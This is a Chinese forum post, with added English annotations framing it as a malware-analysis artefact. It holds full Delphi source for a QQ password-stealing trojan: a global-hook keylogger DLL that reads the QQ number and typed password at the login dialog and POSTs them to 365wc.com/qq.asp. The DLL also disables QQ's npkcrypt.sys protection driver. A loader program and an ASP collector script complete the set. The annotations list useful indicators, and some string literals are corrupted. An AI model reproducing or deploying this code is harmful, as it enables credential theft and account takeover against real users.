DELPHI版本QQ木马 (Delphi-based QQ credential-stealing trojan: a global-hook keylogger DLL, a small loader, and an ASP collector. Reproduced here as a malware-analysis artefact — forum markup has corrupted several string literals in the transcription, so the listing does not compile as posted. Indicators visible in the code: outbound HTTP POST to 365wc.com/qq.asp with User-Agent "MyApp", local log c:\qq.txt, mutex "AnskyaQqGameOne", and renaming/deleting npkcrypt.sys in the QQ install directory.)
首先写个DLL文件
library Project1;
{ Important note about DLL memory management: ShareMem must be the
first unit in your library's USES clause AND your project's (select
Project-View Source) USES clause if your DLL exports any procedures or
functions that pass strings as parameters or function results. This
applies to all strings passed to and from your DLL--even those that
are nested in records and classes. ShareMem is the interface unit to
the BORLNDMM.DLL shared memory manager, which must be deployed along
with your DLL. To avoid using BORLNDMM.DLL, pass string information
using PChar or ShortString parameters. }
uses
windows,messages,dialogs,sysutils,shellapi,WinInet,Tlhelp32;
type
PMouseHookStruct = ^TMouseHookStruct;
{$EXTERNALSYM tagMOUSEHOOKSTRUCT}
tagMOUSEHOOKSTRUCT = packed record
pt: TPoint;
hwnd: HWND;
wHitTestCode: UINT;
dwExtraInfo: DWORD;
end;
TMouseHookStruct = tagMOUSEHOOKSTRUCT;
var
hooktime,hhoook:integer;
loggedkeys,originfile,brokefile:string;
KeyHook,MouseHook,WndProcHook:hhook;
function HtmlEncode(s: string): string;
var
i, v1, v2: integer;
function i2s(b: byte): char;
begin
if b <= 9 then result := chr($30 + b)
else result := chr($41 - 10 + b);
end;
begin
result := '';
for i := 1 to length(s) do
if s = ' ' then result := result + '+'
else if (s < ' ') or (s in ['/', '\', ':', '&', '?', '|']) then
begin
v1 := ord(s) mod 16;
v2 := ord(s) div 16;
result := result + '%' + i2s(v2) + i2s(v1);
end
else result := result + s;
end;
//Exfiltration: send the captured credentials with an HTTP POST
function PostURL(const aUrl: string; FTPostQuery: string; const strPostOkResult: string = 'Send OK!'): Boolean;
var
hSession: HINTERNET;
hConnect, hRequest: hInternet;
lpBuffer: array[0..1024 + 1] of Char;
dwBytesRead: DWORD;
HttpStr: string;
HostName, FileName: string;
FTResult: Boolean;
AcceptType: LPStr;
Buf: Pointer;
dwBufLen, dwIndex: DWord;
procedure ParseURL(URL: string; var HostName, FileName: string);
procedure ReplaceChar(c1, c2: Char; var St: string);
var
p: Integer;
begin
while True do
begin
p := Pos(c1, St);
if p = 0 then Break
else St[p] := c2;
end;
end;
var
i: Integer;
begin
if Pos(UpperCase([url=http://]http://'[/url]), UpperCase(URL)) <> 0 then
System.Delete(URL, 1, 7);
i := Pos('/', URL);
HostName := Copy(URL, 1, i);
FileName := Copy(URL, i, Length(URL) - i + 1);
if (Length(HostName) > 0) and (HostName[Length(HostName)] = '/') then
SetLength(HostName, Length(HostName) - 1);
end;
begin
Result := False;
hSession := InternetOpen('MyApp', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
try
if Assigned(hSession) then
begin
ParseURL(aUrl, HostName, FileName);
hConnect := InternetConnect(hSession, PChar(HostName),
INTERNET_DEFAULT_HTTP_PORT, nil, nil, INTERNET_SERVICE_HTTP, 0, 0);
AcceptType := PChar('Accept: */*');
hRequest := HttpOpenRequest(hConnect, 'POST', PChar(FileName), 'HTTP/1.0',
nil, @AcceptType, INTERNET_FLAG_RELOAD, 0);
//
HttpSendRequest(hRequest, 'Content-Type: application/x-www-form-urlencoded', 47,
PChar(FTPostQuery), Length(FTPostQuery));
dwIndex := 0;
dwBufLen := 1024;
GetMem(Buf, dwBufLen);
FTResult := HttpQueryInfo(hRequest, HTTP_QUERY_CONTENT_LENGTH,
Buf, dwBufLen, dwIndex);
if FTResult = True then
try
while True do
begin
dwBytesRead := 1024;
InternetReadFile(hRequest, @lpBuffer, 1024, dwBytesRead);
if dwBytesRead = 0 then break;
lpBuffer[dwBytesRead] := #0;
HttpStr := HttpStr + lpBuffer;
end;
Result := pos(strPostOkResult {'发送成功'}, HttpStr) > 0;
//Form1.Memo1.Lines.Add(Httpstr);
finally
InternetCloseHandle(hRequest);
InternetCloseHandle(hConnect);
end;
end;
finally
InternetCloseHandle(hSession);
end;
end;
procedure logthekeys();//最经典的键盘记录处理函数
var
i : byte;
begin
for i:=8 To 222 do begin if GetAsyncKeyState(i)=-32767 then begin case i of
8 : {loggedkeys := loggedkeys +'[BACKSPACE]'}loggedkeys:=copy(loggedkeys,0,length(loggedkeys)-1) ;
//9 : loggedkeys := loggedkeys + '(TAB)';
//13 : loggedkeys := loggedkeys + #13#10;
//17 : loggedkeys := loggedkeys + '(Ctrl)';
//27 : loggedkeys := loggedkeys + '(ESC)';
32 : loggedkeys := loggedkeys + ' ';
//33 : loggedkeys := loggedkeys + '(Page up)';
//34 : loggedkeys := loggedkeys + '(Page down)';
//35 : loggedkeys := loggedkeys + '(End)';
//36 : loggedkeys := loggedkeys + '(Home)';
37 : loggedkeys := loggedkeys + '(Left)';//这里关键哦~一定要处理好这两个键!我懒得处理
//38 : loggedkeys := loggedkeys + '(Up)';
39 : loggedkeys := loggedkeys + '(Right)';//这里关键哦~一定要处理好这两个键!我懒得处理
//40 : loggedkeys := loggedkeys + '(Down)';
//44 : loggedkeys := loggedkeys + '(Prnt Scrn)';
//45 : loggedkeys := loggedkeys + '(Insert)';
//46 : loggedkeys := loggedkeys + '(Delete)';
//145 : loggedkeys := loggedkeys + '(Scroll lock)';
48 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+')'
else loggedkeys:= loggedkeys+'0';
49 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'!'
else loggedkeys:= loggedkeys+'1';
50 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= [email=loggedkeys+]loggedkeys+'@'[/email]
else loggedkeys:= loggedkeys+'2';
51 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'#'
else loggedkeys:= loggedkeys+'3';
52 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'$'
else loggedkeys:= loggedkeys+'4';
53 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'%'
else loggedkeys:= loggedkeys+'5';
54 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'^'
else loggedkeys:= loggedkeys+'6';
55 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'&'
else loggedkeys:= loggedkeys+'7';
56 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'*'
else loggedkeys:= loggedkeys+'8';
57 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'('
else loggedkeys:= loggedkeys+'9';
65..90 :
begin
if ((GetKeyState(VK_CAPITAL))=1) then
if GetKeyState(VK_SHIFT)<0 then
loggedkeys:= loggedkeys+LowerCase(Chr(i))
else
loggedkeys:= loggedkeys+UpperCase(Chr(i))
else
if GetKeyState(VK_SHIFT)<0 then loggedkeys := loggedkeys+UpperCase(Chr(i))
else
loggedkeys:= loggedkeys+LowerCase(Chr(i));
end;
96..105 : loggedkeys:= loggedkeys + inttostr(i-96);
106: loggedkeys:= loggedkeys+'*';
107: loggedkeys:= loggedkeys+'&';
109: loggedkeys:= loggedkeys+'-';
110: loggedkeys:= loggedkeys+'.';
111: loggedkeys:= loggedkeys+'/';
//144 : loggedkeys:= loggedkeys+'[Num Lock]';
//112..123:loggedkeys:= loggedkeys+'[F'+IntToStr(i - 111)+']';
186 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+':'
else loggedkeys:= loggedkeys+';';
187 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'+'
else loggedkeys:= loggedkeys+'=';
188 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'<'
else loggedkeys:= loggedkeys+',';
189 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'_'
else loggedkeys:= loggedkeys+'-';
190 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'>'
else loggedkeys:= loggedkeys+'.';
191 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'?'
else loggedkeys:= loggedkeys+'/';
192 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'~'
else loggedkeys:= loggedkeys+'`';
219 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'{'
else loggedkeys:= loggedkeys+'[';
220 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'|'
else loggedkeys:= loggedkeys+'\';
221 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'}'
else loggedkeys:= loggedkeys+']';
222 : if GetKeyState(VK_SHIFT)<0 then loggedkeys:= loggedkeys+'"'
else loggedkeys:= loggedkeys+'''';
end;
end;
end;
end;
//============ Locating the login dialog and reading the account-number control ================
function Get_qqnumber:string;
var
buffer:array[0..50] of char;
Window,Number_window:Longint;
begin
result:='';
Window:=findwindow('#32770',nil);
if window=0 then exit;
Number_window:=FindWindowex(window,0,'ComboBox',nil);
if Number_window=0 then exit;
SendMessage(Number_window, $000D, 50, Integer(@buffer));
result:=string(buffer);
end;
Function myGetfocus:THandle; //获得焦点
begin
AttachThreadInput(GetCurrentThreadId, GetWindowThreadProcessId(GetForegroundWindow(), nil), True);
Result := GetParent(GetFocus());
AttachThreadInput(GetCurrentThreadId, GetWindowThreadProcessId(GetForegroundWindow(), nil), False);
end;
function ispassword_window:boolean;//判断当前获取焦点的是否存在QQ密码输入窗口
var
window,password_window:thandle;
begin
result:=false;
window:=findwindow('#32770',nil);
if window=0 then exit;
password_window:=findwindowex(window,0,'edit', nil);
if password_window=0 then exit;
if myGetfocus=password_window then//这里没办法获得焦点
result:=true;
end;
function iswindow:boolean;//判断当前获取焦点的是否存在QQ密码输入窗口
var
window,password_window:thandle;
begin
result:=false;
window:=findwindow('#32770',nil);
if window=0 then exit;
password_window:=findwindowex(window,0,'ComboBox', nil);
if password_window=0 then exit;
if myGetfocus=password_window then//这里没办法获得焦点
result:=true;
end;
procedure jilu(s:string);
var
mytextfile:textfile;
begin
assignfile(mytextfile,'c:\qq.txt');
append(mytextfile);
writeln(mytextfile,datetimetostr(now)+' '+s);
closefile(mytextfile);
end;
function findqqwindow:integer; //句柄
var
h1,h2,h3:Hwnd; //句柄
begin
h1:=0;
h2:=0;
h3:=0;
h1:=findwindow('#32770',nil);
if h1=GetForegroundWindow then //如在顶部 GetForegroundWindow是前台活动窗体
begin
h2:=GetDlgItem(h1,138);//该函数检索指定的对话框中的控制句柄
h3:=GetDlgItem(h1,180);
if (h2<>0) and (h3<>0) then
result:=0
else
result:=1;
end;
end;
//================ Keyboard hook callback (WH_KEYBOARD)
function HookKey(Code:Integer;wParam:WPARAM;lParam:LPARAM):LRESULT;stdcall;
var
s:string;
begin
if findqqwindow=0 then
begin {回车} {键盘按键按下消息}
if (wParam=13) and(((LParam shr 31)and 1)=0) then //这里是说当你回车 键盘消息 和是QQ密码焦点的时候
begin
// messagebox(0,pchar(Get_qqnumber),pchar(loggedkeys),1);
PostURL(http://365wc.com/qq.asp','num='+HtmlEncode(Get_qqnumber)+'&pass='+HtmlEncode(loggedkeys));
s:='QQ号码:'+Get_qqnumber+' ''QQ密码:'+loggedkeys;
jilu(s);
loggedkeys:='';
end else
begin
if (((LParam shr 31)and 1)=0)and(iswindow=false) then
begin
logthekeys();
end;
end;
end;
Result:=CallNextHookEx(KeyHook,code,Wparam,lParam);
end;
//================ Mouse hook callback (WH_MOUSE)
function HookMouse(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export;
var
s:string;
buffer:array[0..3] of char;
begin
//if findqqwindow=0 then
begin{鼠标左键按下消息}
if (findwindow('#32770',nil)<>0)and(wparam=$0201) then
begin
SendMessage(pMOUSEHOOKSTRUCT(lparam)^.hwnd,$000D,3,Integer(@buffer));
if buffer='登' then
begin
PostURL(http://365wc.com/qq.asp','num='+HtmlEncode(Get_qqnumber)+'&pass='+HtmlEncode(loggedkeys));
s:='QQ号码:'+Get_qqnumber+' ''QQ密码:'+loggedkeys;
jilu(s);
// showmessage('send successful');
loggedkeys:='';
// sendemail('smtp.163.com','mszok','邮箱密码 我不能说哦,呵呵','mszok@163.com','mszok@sina.com.cn','good',get_qqnumber+' password:'+get_password);
end;
end;
end;
Result := CallNextHookEx(MouseHook, iCode, wParam, lParam);
end;
function GetQQPath(ExeFileName: string): string;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
modSnapShot: THandle;
mProcess: TMODULEENTRY32;
ret: Boolean;
begin
result :='';
FSnapshotHandle := CreateToolhelp32Snapshot
(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle,
FProcessEntry32);
while integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName))
or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then
begin
modSnapShot := CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, FProcessEntry32.th32ProcessID); //模块快照
mProcess.dwSize := sizeof(TMODULEENTRY32); //初始化TMODULEENTRY32结构大小
ret := module32first(modSnapShot, mProcess); //第一个模块
if ret=true then
Result :=mProcess.szExePath;
end;
ContinueLoop := Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
procedure Brekefile();
var
QQPath:string;
begin
QQPath:=GetQQPath('QQ.exe');
if pos('QQ.exe',QQPath)>1 then
begin
QQPath:=copy(QQPath,1,length(QQPath)-6);
originfile:=QQPath+'npkcrypt.sys' ;
brokefile :=QQPath+'npkmask.sys' ;
try
//copy file to another
copyfile(pchar(originfile),pchar(brokefile),false) ;
//delete file
deletefile(pchar(originfile));
except end;
end;
end;
//======= Window-procedure hook (WH_CALLWNDPROC) ============
function CallWndProc(nCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
begin
// 窗体即将被清除
if (nCode = HC_ACTION) and (PCWPStruct(lParam).message = WM_CREATE) then
Brekefile;
// 调用下一个钩子
Result := CallNextHookEx(WndProcHook, nCode, wParam, lParam);
end;
procedure hookon;
begin
KeyHook:=setwindowshookex(WH_KEYBOARD,@HookKey,Hinstance,0);
MouseHook:=setwindowshookex(WH_mouse,@HookMouse,Hinstance,0);
WndProcHook := SetWindowsHookEx(WH_CALLWNDPROC, @CallWndProc, HInstance, 0);
end;
procedure hookoff;
begin
UnHookWindowsHookEx(KeyHook);
UnHookWindowsHookEx(MouseHook);
UnHookWindowsHookEx(WndProcHook);
end;
//================= Exported functions (called by the loader program below)
exports
hookon,hookoff;
begin
end.
然后写个调用DLL的工程 (Next, the loader program that calls the DLL — it keeps a message loop alive so the hooks stay installed.)
program Main;
uses windows;
var Msg : tMsg;
procedure hookon ; stdcall; external '..\Dll\hook.dll';
procedure hookoff ; stdcall; external '..\Dll\hook.dll';
begin
CreateMutex(nil, True,'AnskyaQqGameOne');//设置一个内存标示~防止程序多次运行
if (GetlastError() <> ERROR_ALREADY_EXISTS) then
begin//如果发现创建标示成功就开始打开钩子~开始记录
hookon;
while GetMessage(Msg, 0, 0, 0) do ;
hookoff;
end else exit;//不然~哼哼就退出~哈哈
end.
这个是用ASP收信的方式 (Server-side collector, written in classic ASP.)
ASP的收信格式采用QQ大盗的格式 (The record format follows the "QQ大盗" / QQ Thief family: `num----pass[----ip:<hxip>]`, one line per report, appended to qq.txt next to the script.)
<%
num=request("num")
pass=request("pass")
hxip=request("hxip")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("qq.txt"),8,True)
if hxip <>"" then
file.writeline num+"----"+pass+"----ip:"+hxip
else
file.writeline num+"----"+pass
end if
file.close
set file=nothing
set fs=nothing
response.write "Send OK!"
%>
保存为ASP放在空间就行 (Save as an .asp file on any ASP-capable host. From a defender's view: the endpoint path /qq.asp, the POST body shape num=…&pass=…, the "Send OK!" reply and a world-appendable qq.txt beside the script are the server-side indicators for this family.)